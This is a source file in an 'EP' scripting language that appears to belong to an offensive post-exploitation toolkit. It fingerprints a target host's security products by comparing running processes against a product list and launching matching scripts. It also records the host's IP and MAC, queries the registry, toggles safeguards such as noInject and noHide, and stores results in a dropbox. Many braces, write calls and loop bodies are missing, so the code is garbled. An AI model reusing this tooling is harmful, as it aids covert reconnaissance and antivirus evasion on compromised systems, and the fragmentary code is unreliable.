2017-04-14 11:45:07 +02:00

476 lines
14 KiB

@include "DropboxAPI.epm";
#struct used to handle the Meta Data
struct metaData{
string $ip;
string $ipw;
string $mac;
string $vendor;
string $product;
string $version;
string $installDate;
string $defUpdates;
string $logFile;
string $quarantine;
string $information;
string $projectName;
string $driveLetter;
string $prepsDir;
string $logdir;
bool $history;
#hash used to handle environment variable safeguards
string %envs;
#This function should be called right after instantiating a metaData struct.
#We will fill in as much information as we can to reduce the number of function calls
sub init(REF metaData @metaData)
#set project name to unknown for now
@metaData.$projectName = "unknown";
#Things we can't get yet, set to ""
@metaData.$vendor = "ERROR";
@metaData.$product = "NTR";
@metaData.$version = "NTR";
@metaData.$installDate = "NTR";
@metaData.$defUpdates = "NTR";
@metaData.$logFile = "NTR";
@metaData.$quarantine = "NTR";
@metaData.$information = "NTR";
@metaData.$logdir = "@metaData.$driveLetter\\logs\\@metaData.$projectName\\@metaData.$ip";
#we also want the MAC Address from the target
@echo off;
@record on;
int $index = GetCmdData("ipAdaptIndex");
string $tempMAC = GetCmdData("ipAdaptPhysAddr");
string $tempIP;
int $counter = 0;
int $i;
foreach $i($index){
$tempIP = GetCmdData("ipAdaptIP_$i");
#have to check for multiple IP's attached to a single NIC
string $multiNIC;
foreach $multiNIC($tempIP){
#echo "$tempMAC[$counter] = $multiNIC";
if( $multiNIC == @metaData.$ip){
@metaData.$mac = $tempMAC[$counter];
#we've found what we are looking for, bail
return TRUE;
#Well this is unfortunate. We can't find an IP-to-MAC match.
#We will take the MAC of the first NIC
@metaData.$mac = $tempMAC[0];
@record off;
@echo on;
#This function should be called right after instantiating a metaData struct.
#We will fill in as much information as we can to reduce the number of function calls
sub init(REF metaData @metaData, REF string %envs )
#failsafe setting, all safeguards are on
%envs{'noInject'} = "TRUE";
%envs{'noRegistry'} = "TRUE";
%envs{'noHide'} = "TRUE";
%envs{'noDriver'} = "TRUE";
%envs{'noKeyboard'} = "TRUE";
%envs{'noProcInfo'} = "TRUE";
#returns the drive letter from the LP environment variable. Includes the :
#Also returns path to preps with the assumption it is located under \preps
sub getPathInfo(OUT string $driveLetter, OUT string $prepsDir)
string $dir = GetEnv("RESOURCESDIR");
string $broke = split("\\",$dir);
$driveLetter = $broke[0];
$prepsDir = "$broke[0]\\$broke[1]\\preps";
#checks to see if there is an existing pspConfig.txt file for the project in quesion.
sub getHistory(REF metaData @metaData)
@echo off;
if(`local fileperms -file "@metaData.$prepsDir\\@metaData.$projectName\\@metaData.$ipw\\pspConfig.txt"`)
{ @metaData.$history = TRUE; }else{ @metaData.$history = FALSE; }
#This function creates the meta data file in the correct XML Schema
sub writeMetaData(IN metaData @metaData)
string $toWrite = "";
$toWrite = "<psp>\r\n<ip>@metaData.$ip</ip>\r\n";
$toWrite = "$toWrite<mac>@metaData.$mac</mac>\r\n";
$toWrite = "$toWrite<vendor>@metaData.$vendor</vendor>\r\n";
$toWrite = "$toWrite<product>@metaData.$product</product>\r\n";
$toWrite = "$toWrite<version>@metaData.$version</version>\r\n";
$toWrite = "$toWrite<installDate>@metaData.$installDate</installDate>\r\n";
$toWrite = "$toWrite<defUpdates>@metaData.$defUpdates</defUpdates>\r\n";
$toWrite = "$toWrite<logFile>@metaData.$logFile</logFile>\r\n";
$toWrite = "$toWrite<quarantine>@metaData.$quarantine</quarantine>\r\n";
$toWrite = "$toWrite<information>@metaData.$information</information>\r\n</psp>";
echo "\r!!!Function writeMetaData could not write pspInfo to local disk!!!\r";
sub writeMetaData(IN metaData @metaData, IN string %envs)
#This function opens the XML results file
sub openMetaData(IN metaData @metaData)
string $toWrite = "<pspInformation>\r\n";
echo "\r!!!Function openMetaData could not write pspInfo to local disk!!!\r";
#This function closes the XML results file
sub closeMetaData(IN metaData @metaData)
string $toWrite = "</pspInformation>\r\n";
echo "\r!!!Function closeMetaData could not write pspInfo to local disk!!!\r";
#06/18/2009 - put a copy in the dropbox for post processing reasons
#Called to compare historic config versus the running config
#Argument 1 is a string that represents the currently running PSP config
#Argument 2 is the IP the target is post-processed under
sub checkConfig(IN string $currentValue, IN metaData @metaData)
#we still want to write the current config to disk. do that now
string $PSPHistory = "";
@echo off;
#paranoia check
ifnot(`local fileperms -file "@metaData.$prepsDir\\@metaData.$projectName\\@metaData.$ipw\\pspConfig.txt"`){
@echo on;
echo "\r\r!!!In function checkConfig\rThe file @metaData.$prepsDir\\@metaData.$projectName\\@metaData.$ipw\\pspConfig.txt doesn't appear to exist.\rThis shouldn't happen!.";
return FALSE;
@echo on;
echo "\r\r!!!In function checkConfig\rCan't read @metaData.$prepsDir\\@metaData.$projectName\\@metaData.$ipw\\pspConfig.txt\rMakes comparing values difficult!";
string $line;
foreach $line($PSPHistory){
if($line == $currentValue){ return true; }
#They have changed something!
return false;
#This function should be called when the target has no pspConfig.txt file
#Argument 1 is a string that represents the currently running PSP config
#Argument 2 is the IP the target is post-processed under
sub createConfig(IN string $currentValue, IN metaData @metaData)
echo "\r!!!In function createConfig\rCould not write current PSP settings to local disk!!!";
return FALSE;
#echo "Just wrote data to @metaData.$logdir\\pspConfig.txt";
return TRUE;
#Determine the IP the target is post-processed under
#Returns the IP in the first variable
#Returns the IP with w appended in the second variable
#The second is needed because of string limitations in EP
sub myIP(OUT string $IP, OUT string $IPw){
@echo off;
@record on;
`getdirectory -logs`;
string $line = GetCmdData("dir");
@echo on;
@record off;
string $temp = split("\\",$line);
$IP = $temp[3];
$IPw = "w";
$IPw = "$IP$IPw";
#This function will determine the project name from the preps directory
#If they have two folders in the preps directory, we make them choose which one they want
#We return the project name
#this function should only be called by checkPSP.eps due to the use of the struct
#A generic function can be found in GenericFunctions.epm
sub getProjectName(REF metaData @metaData)
@record on;
@echo off;
if(`lpgetenv -option PROJECTNAME`){
#variable already set. that was easy
@metaData.$projectName = GetCmdData("value");
return true;
`local dir @metaData.$prepsDir\\*`;
string $folderList = GetCmdData("name");
bool $folderProperty = GetCmdData("isDir");
@record off;
@echo on;
string $foo;
int $i = 0;
int $x = 0;
#ignore non-folders and the . and .. files
ifnot($folderList[$x] == "." || $folderList[$x] == ".."){
@metaData.$projectName[$i] = $folderList[$x];
#they might have more than one folder in the preps directory. catch that here
#not sure why they have 2, but we'll accomodate
echo "I've found more than 1 possible project names in the preps directory\rHelp me to help you";
echo "[$i] @metaData.$projectName[$i]";
$i = GetInput("Which name is correct?");
$foo = @metaData.$projectName[$i];
@metaData.$projectName = $foo;
if(@metaData.$projectName == "unknown"){
#prompt user for projectname. we don't really need it here, but other scripts probably will
@metaData.$projectName = GetInput("Please enter the project name now. Prep4op to avoid this");
`lpsetenv -option PROJECTNAME -value @metaData.$projectName`;
return TRUE;
#Compares the processlist against the elist in an effort to identify running PSPs
#For each found PSP, we check to see if a corresponding script exists
#Those that do are placed in the first variable, toRun
#All others are returned in toCreate
#Use of hash removes duplicate entries
sub checkProcList (REF string %toRun, REF string %toCreate, IN string $driveLetter){
#sub checkProcList (REF string %toRun, REF string $toCreate, IN string $driveLetter){
# Get the processlist
@echo off;
@record on;
ifnot (`log processlist`) {
echo "Couldn't get Processlist";
return false;
@record off;
int $ids = GetCmdData("id");
string $names = GetCmdData("name");
# Get the scripts directory
@record on;
ifnot (`getdirectory -scripts`) {
echo "Couldn't get directory";
return false;
@record off;
string $scripts_path = GetCmdData("dir");
# For each process, get it's description from elist.txt
int $i=0;
#x is used as a counter for tracking how many we don't have scripts for
int $x=0;
while ($i < sizeof($ids)) {
#echo "Checking $names[$i]";
@echo off; @record on;
`local grep -mask elist.txt -pattern $names[$i] -path $driveLetter\\OPSDisk\\Resources\\EP -unicode`;
@record off; @echo on;
string $match = GetCmdData("line_data");
if (defined $match ) {
# Get name between the exclamation points
string $parts = Split(":\t\t\t\t\t\t",$match);
string $psp = Split("!!!", $parts[1]);
string $process = $parts[0];
# NOTE: The elist must match EXACTLY. Not just regular expression match
bool $exactMatch = false;
if($process == $names[$i]) {
$exactMatch = true;
} else {
# echo "$process didn't EXACTLY match $names[$i]. Skipping it";
$exactMatch = false;
if ( defined $psp[1] && $exactMatch ) {
string $cleanName = Split(" ", $psp[1]);
$cleanName = $cleanName[1];
#If exists, place in toRun
if(`local fileperms -file $scripts_path\\psp\\$cleanName[1].eps`) {
%toRun{'$cleanName[1]'} = "$cleanName[1].eps";
} else {
%toCreate{'$cleanName[1]'} = "$cleanName[1]";
#string $clean = split(":\t\t\t\t\t",$match);
#$toCreate[$x] = "$clean[0] $clean[1]";
#Takes a hash of PSP's that were identified as running and we have a script for
#Simply kicks off each script in turn
sub runList(IN string %toRun)
string $line;
foreach $line(keys %toRun){
`script PSP\\%toRun{'$line'}`;
#Takes a hash of PSP's that were identified as running and we DO NOT have a script for
#Simply show this information on the screen
#sub createList(IN string %toCreate)
#sub createList(IN string $toCreate, IN metaData @metaData)
sub createList(IN string %toCreate, IN metaData @metaData)
echo "I noticed these PSPs running, but there are no scripts implemented yet:";
string $key;
foreach $key(keys %toCreate){
@metaData.$vendor = $key;
echo "$key";
echo "\r";
sub setEnvs(IN string %envs)
string $key;
string $currValue;
foreach $key(keys %envs)
if(%envs{'$key'} == "TRUE")
@echo off;
`lpsetenv -option $key -value "TRUE"`;
# values = the values from the subkey that you are looking for
# ret = return values (in an array)
# error = do you want to halt on query errors
sub reg_query(IN string $subkey, IN string $search_values, OUT string $ret, IN bool $error)
string $values;
string $value;
string $value_data;
bool $got_error = false;
int $i=0;
int $j=0;
@record on;
#echo "regquery -hive L -subkey \"$subkey\"";
if(`regquery -hive L -subkey "$subkey"`)
$values = GetCmdData("value");
$value_data = GetCmdData("value_data");
int $size = sizeof($values);
int $size_search = sizeof($search_values);
if($size_search > $size)
$got_error = true;
string $search_value;
foreach $search_value ($search_values)
bool $found_value = false;
foreach $value ($values)
if($value == $search_value)
$ret[$i] = $value_data[$j];
$found_value = true;
echo "ERROR: Did not find value \"$value\" in subkey \"$subkey\"";
$got_error = true;
echo "";
echo "Cannot query \"$subkey\".";
echo "regquery -hive L -subkey \"$subkey\"\n";
if(prompt "Continue")
return false;
return false;
@record off;
$ret = "ERROR!!!";
return false;
return true;